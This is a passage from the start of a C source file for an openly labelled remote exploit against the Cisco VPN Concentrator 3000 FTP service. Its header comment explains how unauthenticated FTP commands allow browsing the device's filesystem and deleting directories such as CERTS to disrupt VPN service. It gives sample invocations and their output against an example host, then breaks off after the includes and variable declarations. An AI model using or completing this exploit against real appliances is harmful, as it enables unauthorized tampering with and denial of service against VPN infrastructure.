1 /* Cisco VPN Concentrator 3000 FTP remote exploit
2 * ==============================================
3 * A vulnerability exists in the Cisco VPN Concentrator 3000:
4 * an unauthenticated user may access the file system through
5 * manipulation of FTP service commands. An unauthenticated
6 * user can use the following commands:
7 *
8 * CWD − Change the current working directory
9 * MKD − Make a directory within the current working directory
10 * CDUP − Change directory up one tree.
11 * RNFR − Rename From (This can be used to identify files and directories)
12 * SIZE − This can be used to identify files and directories
13 * RMD − This can be used to delete a directory
14 *
15 * The FTP service remembers the current working directory so directory
16 * changes can affect exploitation. By removing potentially sensitive
17 * directories such as "CERTS" it may be possible to disrupt service
18 * to a VPN.
19 *
20 * Confirmed Vulnerable
21 * + Cisco Systems Inc./VPN 3000 concentrator Version 4.1.5 RelJun 18 2004
22 *
23 * Example.
24 * localhost exploits # ./prdelka−vs−CISCO−vpnftp −s 10.1.2.10 −c /
25 * [ Cisco VPN Concentrator 3000 FTP service exploit
26 * [ Connected to 10.1.2.10 (21/tcp)
27 * [ Changing directory to /
28 * [ Success! changed directory to /
29 * localhost exploits # ./prdelka−vs−CISCO−vpnftp −s 10.1.2.10 −t config
30 * [ Cisco VPN Concentrator 3000 FTP service exploit
31 * [ Connected to 10.1.2.10 (21/tcp)
32 * [ Testing for the existance of config
33 * [ Success! file config does exist!
34 *
35 *
36 * − prdelka
37 */
38 #include <sys/types.h>
39 #include <sys/socket.h>
40 #include <netinet/in.h>
41 #include <arpa/inet.h>
42 #include <netdb.h>
43 #include <stdio.h>
44 #include <unistd.h>
45 #include <stdlib.h>
46 #include <getopt.h>
47 #include <signal.h>
48
49 int main (int argc, char *argv[]){
50
int ihost=0,index=0,imkdir=0,ichdir=0,idelete=0,itest=0,ipass=0,port=21;
51
int c, sd, rc, size;
52
char *host, *directory, *file, *buffer, *rbuffer;